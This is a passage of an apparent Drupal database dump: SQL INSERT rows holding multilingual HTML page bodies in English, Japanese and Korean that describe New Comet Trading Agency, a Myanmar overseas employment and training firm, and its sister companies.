Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">끊임없이</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노력하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p><o:p></o:p></p><img src=\"/sites/default/files/inline-images/page01.jpg\" data-align=\"center\" data-entity-uuid=\"bb0a6309-0480-4e15-977d-7779b6ab5882\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page02.jpg\" data-align=\"center\" data-entity-uuid=\"3d648acd-e4d6-422e-96ec-0f4ef8a0ddaa\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page03.jpg\" data-align=\"center\" data-entity-uuid=\"b4e48cbd-91b4-4348-a15c-c383659f5dff\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page04.jpg\" data-align=\"center\" data-entity-uuid=\"f62451bb-2aa5-4267-9cf7-76b35949208e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page05.jpg\" data-align=\"center\" data-entity-uuid=\"f7fdcca7-3b28-4e95-9a70-f8ca466d9476\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page06.jpg\" data-align=\"center\" data-entity-uuid=\"565a7606-51ac-43fc-9c7a-1f2fe7c3935d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page07.jpg\" data-align=\"center\" data-entity-uuid=\"241602f2-5bf8-4040-8551-8abbc9990697\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page08.jpg\" data-align=\"center\" data-entity-uuid=\"4ee88431-32e2-499a-873a-72b73c80dd87\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page09.jpg\" data-align=\"center\" data-entity-uuid=\"f14ca664-92dd-4ef8-ac3e-6d7665765749\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page10.jpg\" data-align=\"center\" data-entity-uuid=\"1bafeb42-76e2-496a-a9bb-90b065a98e37\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page11.jpg\" data-align=\"center\" data-entity-uuid=\"9e05184a-372e-4ef0-aec6-040a7de4d8b5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page12.jpg\" data-align=\"center\" data-entity-uuid=\"e5ff5315-6ae9-4838-b6d0-5df07c2ac651\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page13.jpg\" data-align=\"center\" data-entity-uuid=\"d8e1cc86-6131-4a2c-9b1a-387a91c23038\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page14.jpg\" data-align=\"center\" data-entity-uuid=\"9b73fa8d-862d-4337-80d5-bbf9a45b1135\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page15.jpg\" data-align=\"center\" data-entity-uuid=\"99d39ec1-71a6-43ab-9303-45f7f07a6c01\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page16.jpg\" data-align=\"center\" data-entity-uuid=\"db0f80ea-271e-4bc0-85c9-e33617ed58be\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page17.jpg\" data-align=\"center\" data-entity-uuid=\"249cb91a-e2ab-42f1-880d-08e1d3661363\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page18.jpg\" data-align=\"center\" data-entity-uuid=\"1648c123-aec8-4914-94b5-6f74fc86d322\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page19.jpg\" data-align=\"center\" data-entity-uuid=\"1483aff7-adb3-4f9d-bba2-26c25de4af05\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page20.jpg\" data-align=\"center\" data-entity-uuid=\"e8ecf841-902b-4d50-a3db-9e840b757bb0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page21.jpg\" data-align=\"center\" data-entity-uuid=\"c1febdfa-ff0f-4b40-85b8-662e08593da9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page22.jpg\" data-align=\"center\" data-entity-uuid=\"2fa91eac-f8ad-4e49-a4ed-f30c44a54f97\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page23.jpg\" data-align=\"center\" data-entity-uuid=\"01f43faf-2b33-446b-b89b-c870d79d8382\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page24.jpg\" data-align=\"center\" data-entity-uuid=\"67b85639-9d9b-4dba-9e7e-104386c5d10b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page25.jpg\" data-align=\"center\" data-entity-uuid=\"a59b58d5-c9f3-44ec-8705-b4cae7c7abea\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page26.jpg\" data-align=\"center\" data-entity-uuid=\"1ad640d5-c50a-4585-8518-2626580dcf51\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page27.jpg\" data-align=\"center\" data-entity-uuid=\"6ba5b697-692e-4e17-95d5-30299f4c7807\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page28.jpg\" data-align=\"center\" data-entity-uuid=\"ec9ac328-ce1c-4c50-bf7c-cee9f6ffc7bf\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page29.jpg\" data-align=\"center\" data-entity-uuid=\"459f3255-eeea-4f27-952a-43eeef000608\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page30.jpg\" data-align=\"center\" data-entity-uuid=\"b24121df-13a4-4612-ab32-c11ca913e9f2\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 200, 'en', 0, '<p>&nbsp;<span style=\"font-size:14.0pt;line-height:107%;\">We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">&nbsp;We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</span></p><p><span style=\"font-size:14.0pt;line-height:107%;\">Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</span></p><img src=\"/sites/default/files/inline-images/page01.jpg\" data-align=\"center\" data-entity-uuid=\"bb0a6309-0480-4e15-977d-7779b6ab5882\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page02.jpg\" data-align=\"center\" data-entity-uuid=\"3d648acd-e4d6-422e-96ec-0f4ef8a0ddaa\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page03.jpg\" data-align=\"center\" data-entity-uuid=\"b4e48cbd-91b4-4348-a15c-c383659f5dff\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page04.jpg\" data-align=\"center\" data-entity-uuid=\"f62451bb-2aa5-4267-9cf7-76b35949208e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page05.jpg\" data-align=\"center\" data-entity-uuid=\"f7fdcca7-3b28-4e95-9a70-f8ca466d9476\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page06.jpg\" data-align=\"center\" data-entity-uuid=\"565a7606-51ac-43fc-9c7a-1f2fe7c3935d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page07.jpg\" data-align=\"center\" data-entity-uuid=\"241602f2-5bf8-4040-8551-8abbc9990697\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page08.jpg\" data-align=\"center\" data-entity-uuid=\"4ee88431-32e2-499a-873a-72b73c80dd87\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page09.jpg\" data-entity-uuid=\"f14ca664-92dd-4ef8-ac3e-6d7665765749\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page10.jpg\" data-entity-uuid=\"1bafeb42-76e2-496a-a9bb-90b065a98e37\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page11.jpg\" data-entity-uuid=\"9e05184a-372e-4ef0-aec6-040a7de4d8b5\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page12.jpg\" data-entity-uuid=\"e5ff5315-6ae9-4838-b6d0-5df07c2ac651\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page13.jpg\" data-entity-uuid=\"d8e1cc86-6131-4a2c-9b1a-387a91c23038\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page14.jpg\" data-entity-uuid=\"9b73fa8d-862d-4337-80d5-bbf9a45b1135\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page15.jpg\" data-entity-uuid=\"99d39ec1-71a6-43ab-9303-45f7f07a6c01\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page16.jpg\" data-entity-uuid=\"db0f80ea-271e-4bc0-85c9-e33617ed58be\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page17.jpg\" data-entity-uuid=\"249cb91a-e2ab-42f1-880d-08e1d3661363\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page18.jpg\" data-entity-uuid=\"1648c123-aec8-4914-94b5-6f74fc86d322\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page19.jpg\" data-entity-uuid=\"1483aff7-adb3-4f9d-bba2-26c25de4af05\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page20.jpg\" data-entity-uuid=\"e8ecf841-902b-4d50-a3db-9e840b757bb0\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page21.jpg\" data-entity-uuid=\"c1febdfa-ff0f-4b40-85b8-662e08593da9\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page22.jpg\" data-entity-uuid=\"2fa91eac-f8ad-4e49-a4ed-f30c44a54f97\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page23.jpg\" data-entity-uuid=\"01f43faf-2b33-446b-b89b-c870d79d8382\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page24.jpg\" data-entity-uuid=\"67b85639-9d9b-4dba-9e7e-104386c5d10b\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page25.jpg\" data-entity-uuid=\"a59b58d5-c9f3-44ec-8705-b4cae7c7abea\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page26.jpg\" data-entity-uuid=\"1ad640d5-c50a-4585-8518-2626580dcf51\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page27.jpg\" data-entity-uuid=\"6ba5b697-692e-4e17-95d5-30299f4c7807\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page28.jpg\" data-entity-uuid=\"ec9ac328-ce1c-4c50-bf7c-cee9f6ffc7bf\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page29.jpg\" data-entity-uuid=\"459f3255-eeea-4f27-952a-43eeef000608\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page30.jpg\" data-entity-uuid=\"b24121df-13a4-4612-ab32-c11ca913e9f2\" data-entity-type=\"file\" data-align=\"center\">', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 23, 200, 'ja', 0, '<p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">当社は</span><span style=\"mso-bidi-font-size:10.5pt;\">2004</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年に設立し、登録</span><span style=\"mso-bidi-font-size:10.5pt;\">ID(295/2004</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ー</span><span style=\"mso-bidi-font-size:10.5pt;\">2005)</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">を持ち、サービスの提供を行ってきました。ニューコメットトレンディーグ海外エイジェンシー登録を</span><span style=\"mso-bidi-font-size:10.5pt;\">2023</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年にできまして、運営を始めました。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ニューコメットトレーディング会社のグループ会社である</span><span style=\"mso-bidi-font-size:10.5pt;\">.</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ゼィーヤーニューコメットとしては自動車輸入許可をもらって現場用トラックや、旅行用と交通機関などに使用されるバスや色々な機械を日本から直接輸入をし、販売する事業を</span><span style=\"mso-bidi-font-size:10.5pt;\">25</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年間やり続けてきました。税金の納税もしっかり行なった上、</span><span style=\"mso-bidi-font-size:10.5pt;\">100</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">人の従業員を持つ事ができました。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">それに、グループ会社であるニューコメットト建築会社、ゼィーヤシュェピーティー建築会社、アウンネーウィン建築会社でも政府からきょかおたくさん頂き、</span><span style=\"mso-bidi-font-size:10.5pt;\">200</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">人程の従業員を持った会社として動いております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">現在、ニューコメットトレンディグエイジェンシーでは韓国の造船所で働きたいミャンマー全国から民族問わず、商務部の下でシンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">そして、ドバイ、マレーシア、シンガポール、タイ、日本にもお仕事紹介できる様に力を注いでおります。</span><o:p></o:p></p><p class=\"MsoNormal\"><span lang=\"JA\">ミャンマーの若者達には自分に合ったお仕事や自分らしさをたもちながら、日本の技術を勉強できるようにサポートをし続けたいと努力をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span lang=\"JA\">日本語能力試験</span>(JLPT,<span style=\"mso-spacerun:yes;\">&nbsp; </span>JFT, NAT-TEST, TOP-J)<span lang=\"JA\">を合格した生徒はワークビザ、研修ビザなどて、いけるように提案をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span lang=\"JA\">我々ニューコメットトレーディング会社からは経験豊富で、能力の高い研修生達を生み出し、海外の仕事チャンスを与えることに重ねて努力をしてまいります。</span><o:p></o:p></p><img src=\"/sites/default/files/inline-images/page01.jpg\" data-align=\"center\" data-entity-uuid=\"bb0a6309-0480-4e15-977d-7779b6ab5882\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page02.jpg\" data-align=\"center\" data-entity-uuid=\"3d648acd-e4d6-422e-96ec-0f4ef8a0ddaa\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page03.jpg\" data-align=\"center\" data-entity-uuid=\"b4e48cbd-91b4-4348-a15c-c383659f5dff\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page04.jpg\" data-align=\"center\" data-entity-uuid=\"f62451bb-2aa5-4267-9cf7-76b35949208e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page05.jpg\" data-align=\"center\" data-entity-uuid=\"f7fdcca7-3b28-4e95-9a70-f8ca466d9476\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page06.jpg\" data-align=\"center\" data-entity-uuid=\"565a7606-51ac-43fc-9c7a-1f2fe7c3935d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page07.jpg\" data-align=\"center\" data-entity-uuid=\"241602f2-5bf8-4040-8551-8abbc9990697\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page08.jpg\" data-align=\"center\" data-entity-uuid=\"4ee88431-32e2-499a-873a-72b73c80dd87\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page09.jpg\" data-align=\"center\" data-entity-uuid=\"f14ca664-92dd-4ef8-ac3e-6d7665765749\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page10.jpg\" data-align=\"center\" data-entity-uuid=\"1bafeb42-76e2-496a-a9bb-90b065a98e37\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page11.jpg\" data-align=\"center\" data-entity-uuid=\"9e05184a-372e-4ef0-aec6-040a7de4d8b5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page12.jpg\" data-align=\"center\" data-entity-uuid=\"e5ff5315-6ae9-4838-b6d0-5df07c2ac651\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page13.jpg\" data-align=\"center\" data-entity-uuid=\"d8e1cc86-6131-4a2c-9b1a-387a91c23038\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page14.jpg\" data-align=\"center\" data-entity-uuid=\"9b73fa8d-862d-4337-80d5-bbf9a45b1135\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page15.jpg\" data-align=\"center\" data-entity-uuid=\"99d39ec1-71a6-43ab-9303-45f7f07a6c01\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page16.jpg\" data-align=\"center\" data-entity-uuid=\"db0f80ea-271e-4bc0-85c9-e33617ed58be\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page17.jpg\" data-align=\"center\" data-entity-uuid=\"249cb91a-e2ab-42f1-880d-08e1d3661363\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page18.jpg\" data-align=\"center\" data-entity-uuid=\"1648c123-aec8-4914-94b5-6f74fc86d322\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page19.jpg\" data-align=\"center\" data-entity-uuid=\"1483aff7-adb3-4f9d-bba2-26c25de4af05\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page20.jpg\" data-align=\"center\" data-entity-uuid=\"e8ecf841-902b-4d50-a3db-9e840b757bb0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page21.jpg\" data-align=\"center\" data-entity-uuid=\"c1febdfa-ff0f-4b40-85b8-662e08593da9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page22.jpg\" data-align=\"center\" data-entity-uuid=\"2fa91eac-f8ad-4e49-a4ed-f30c44a54f97\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page23.jpg\" data-align=\"center\" data-entity-uuid=\"01f43faf-2b33-446b-b89b-c870d79d8382\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page24.jpg\" data-align=\"center\" data-entity-uuid=\"67b85639-9d9b-4dba-9e7e-104386c5d10b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page25.jpg\" data-align=\"center\" data-entity-uuid=\"a59b58d5-c9f3-44ec-8705-b4cae7c7abea\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page26.jpg\" data-align=\"center\" data-entity-uuid=\"1ad640d5-c50a-4585-8518-2626580dcf51\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page27.jpg\" data-align=\"center\" data-entity-uuid=\"6ba5b697-692e-4e17-95d5-30299f4c7807\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page28.jpg\" data-align=\"center\" data-entity-uuid=\"ec9ac328-ce1c-4c50-bf7c-cee9f6ffc7bf\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page29.jpg\" data-align=\"center\" data-entity-uuid=\"459f3255-eeea-4f27-952a-43eeef000608\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page30.jpg\" data-align=\"center\" data-entity-uuid=\"b24121df-13a4-4612-ab32-c11ca913e9f2\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 200, 'ko', 0, '<p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희</span><span style=\"mso-fareast-language:KO;\"> ``New Comet Trading\'\'&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사는</span><span style=\"mso-fareast-language:KO;\"> 2004</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">설립되어</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업자등록번호</span><span style=\"mso-fareast-language:KO;\">(295/2004-2005)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">로</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">영업을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧무역대행</span><span style=\"mso-fareast-language:KO;\"> 2023</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">외국인고용업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">면허를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취득하여</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">활동을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희 <strong>뉴코멧</strong></span><span style=\"mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong>&nbsp;</span><span style=\"mso-fareast-language:KO;\">\"New Comet Overseas Employment Agency\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는자매</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\"> </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야뉴코멧 자동차 판매 및 서비스 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧회사</strong>등</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기업들과</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">협력하여</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">경제통상자원부에서&nbsp;</span><span style=\"mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">차량</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수입허가를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">신청했고</span><span style=\"mso-fareast-language:KO;\" 